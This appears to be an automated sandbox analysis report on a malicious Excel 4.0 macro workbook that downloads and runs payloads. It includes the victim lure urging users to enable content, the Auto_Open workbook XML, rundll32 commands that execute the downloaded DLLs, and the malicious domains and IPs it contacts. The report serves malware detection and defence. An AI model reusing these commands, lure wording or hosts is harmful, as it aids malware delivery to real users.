Loading ...

Play interactive tourEdit tour

Analysis Report document-752139500.xlsm

Overview

General Information

Sample Name:document-752139500.xlsm
Analysis ID:395471
MD5:0230e912063f0d55408aa5fb25866d92
SHA1:454b82fabe618b94265599d4bb680270abfe68de
SHA256:824cd169a5d68c035a1b8e6cf0f6ac56085c77a93bfabfffce6452fd5790a5e4
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1472 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2628 cmdline: rundll32 ..\oepddl.igk1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2564 cmdline: rundll32 ..\oepddl.igk2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 162.241.225.246:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49168 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: abpandh.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.241.225.246:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.241.225.246:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 5.100.155.169 5.100.155.169
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27312AD1.pngJump to behavior
    Source: rundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: abpandh.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: rundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownHTTPS traffic detected: 162.241.225.246:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 10 11 from the yellow bar above 12 13 Once You have Enable Editing, please ell
    Source: Screenshot number: 8Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 D 1 16 17 I ,8 I
    Source: Screenshot number: 8Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 D 1 16 17 I ,8 I WHY I CANNOTOPEN THIS DOCUME
    Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Source: Screenshot number: 12Screenshot OCR: Enable Editing 10 11 1 from the yellow bar above 12 13 1 Once You have Enable Editing, please
    Source: Screenshot number: 12Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 D 1 16 17 I ,8 I WHY I CANNOTOPEN THIS DocUME
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-752139500.xlsmInitial sample: CALL
    Source: document-752139500.xlsmInitial sample: EXEC
    Source: document-752139500.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: document-752139500.xlsmInitial sample: Sheet size: 6239
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9303"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="Sheet" sheetId="6" r:id="rId1"/><sheet name="Sheet1" sheetId="5" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="7" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AY$34</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: rundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal68.troj.expl.evad.winXLSM@5/16@2/2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$document-752139500.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDC1B.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\oepddl.igk1,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\oepddl.igk1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\oepddl.igk2,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\oepddl.igk1,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\oepddl.igk2,DllRegisterServerJump to behavior
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: document-752139500.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: document-752139500.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: document-752139500.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: document-752139500.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: document-752139500.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: document-752139500.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    kamalandcompany.com
    5.100.155.169
    truefalse
      unknown
      abpandh.com
      162.241.225.246
      truefalse
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpfalse
          high
          http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.comrundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpfalse
              high
              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpfalse
                high
                http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2116292504.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109561223.0000000001E47000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpfalse
                  high
                  http://investor.msn.com/rundll32.exe, 00000003.00000002.2116045609.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109365397.0000000001C60000.00000002.00000001.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    162.241.225.246
                    abpandh.comUnited States
                    46606UNIFIEDLAYER-AS-1USfalse
                    5.100.155.169
                    kamalandcompany.comUnited Kingdom
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse

                    General Information

                    Joe Sandbox Version:31.0.0 Emerald
                    Analysis ID:395471
                    Start date:22.04.2021
                    Start time:15:19:15
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 48s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:document-752139500.xlsm
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal68.troj.expl.evad.winXLSM@5/16@2/2
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsm
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Found warning dialog
                    • Click Ok
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.210, 2.20.142.209
                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    162.241.225.246document-1700722839.xlsmGet hashmaliciousBrowse
                      document-1700722839.xlsmGet hashmaliciousBrowse
                        5.100.155.169http://y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074Get hashmaliciousBrowse
                        • y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        kamalandcompany.comdocument-1700722839.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        document-1700722839.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        abpandh.comdocument-1700722839.xlsmGet hashmaliciousBrowse
                        • 162.241.225.246
                        document-1700722839.xlsmGet hashmaliciousBrowse
                        • 162.241.225.246

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        PUBLIC-DOMAIN-REGISTRYUSdocument-1700722839.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        document-1700722839.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        PO#5300008762.exeGet hashmaliciousBrowse
                        • 208.91.199.223
                        CNFO-9191.exeGet hashmaliciousBrowse
                        • 208.91.199.224
                        PO NO 16670,16671,16672.exeGet hashmaliciousBrowse
                        • 208.91.198.143
                        Quotation 301086.exeGet hashmaliciousBrowse
                        • 208.91.199.223
                        Order pending .pdf.exeGet hashmaliciousBrowse
                        • 208.91.198.143
                        wOyUOddOzD.exeGet hashmaliciousBrowse
                        • 208.91.199.223
                        5Huf9v44bz.exeGet hashmaliciousBrowse
                        • 208.91.198.143
                        file.exeGet hashmaliciousBrowse
                        • 208.91.199.225
                        QUO-131.exeGet hashmaliciousBrowse
                        • 208.91.199.223
                        Quote Request #7779510.docGet hashmaliciousBrowse
                        • 208.91.198.143
                        SwBedRrOUJ.exeGet hashmaliciousBrowse
                        • 208.91.199.224
                        hIkIc5HWzh.exeGet hashmaliciousBrowse
                        • 208.91.199.223
                        35,276.70 SWIFT.xlsxGet hashmaliciousBrowse
                        • 208.91.199.225
                        Proforma IO108090.exeGet hashmaliciousBrowse
                        • 208.91.198.143
                        PI#001890576.exeGet hashmaliciousBrowse
                        • 208.91.199.224
                        4600004505.exeGet hashmaliciousBrowse
                        • 208.91.199.223
                        ACH Payment copy.htmlGet hashmaliciousBrowse
                        • 216.10.250.102
                        catalog-1840888847.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        UNIFIEDLAYER-AS-1USdocument-1700722839.xlsmGet hashmaliciousBrowse
                        • 162.241.225.246
                        document-1700722839.xlsmGet hashmaliciousBrowse
                        • 162.241.225.246
                        SecuriteInfo.com.Heur.29862.xlsmGet hashmaliciousBrowse
                        • 192.254.232.91
                        SecuriteInfo.com.Heur.10624.xlsmGet hashmaliciousBrowse
                        • 67.20.116.79
                        SecuriteInfo.com.Heur.29862.xlsmGet hashmaliciousBrowse
                        • 192.254.232.91
                        SecuriteInfo.com.Heur.29862.xlsmGet hashmaliciousBrowse
                        • 192.254.232.91
                        Invoice #035.xlsmGet hashmaliciousBrowse
                        • 192.185.3.44
                        Invoice #035.xlsmGet hashmaliciousBrowse
                        • 192.185.3.44
                        Invoice #035.xlsmGet hashmaliciousBrowse
                        • 192.185.3.44
                        GS_ PO NO.1862021.exeGet hashmaliciousBrowse
                        • 192.185.90.36
                        Maersk_BL Draft_copy_Shipping_documents.htmlGet hashmaliciousBrowse
                        • 108.179.194.12
                        catalog-1840888847.xlsmGet hashmaliciousBrowse
                        • 173.254.61.152
                        catalog-1840888847.xlsmGet hashmaliciousBrowse
                        • 173.254.61.152
                        k7AgZOwF4S.exeGet hashmaliciousBrowse
                        • 69.195.83.71
                        catalog-1576384985.xlsmGet hashmaliciousBrowse
                        • 173.254.61.152
                        catalog-1576384985.xlsmGet hashmaliciousBrowse
                        • 173.254.61.152
                        GS_ PO NO.1862021.exeGet hashmaliciousBrowse
                        • 192.185.90.36
                        apr.20.confirmaci#U0e02n SWIFT.exeGet hashmaliciousBrowse
                        • 162.241.219.11
                        catalog-193510902.xlsmGet hashmaliciousBrowse
                        • 173.254.61.152
                        catalog-193510902.xlsmGet hashmaliciousBrowse
                        • 173.254.61.152

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        7dcce5b76c8b17472d024758970a406bAnalysis Reports.pptGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        original_file.pptGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        document-1700722839.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        Payment slip.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        Remittance_PO-89488484.pptGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        PO944888299393.ppsGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        shipping doc.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        PI_63455MV_REVISED.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        USD.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        Offer from China.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        Revised SOA.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        PO.0245GT.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        NEW ORDER.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        M.V. OMNI TIGRIS.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        catalog-244648589.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        catalog-795480997.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        catalog-936643648.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        catalog-1715742540.xlsmGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246
                        APRemittanceAdvice.xlsxGet hashmaliciousBrowse
                        • 5.100.155.169
                        • 162.241.225.246

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                        Category:dropped
                        Size (bytes):58596
                        Entropy (8bit):7.995478615012125
                        Encrypted:true
                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                        MD5:61A03D15CF62612F50B74867090DBE79
                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
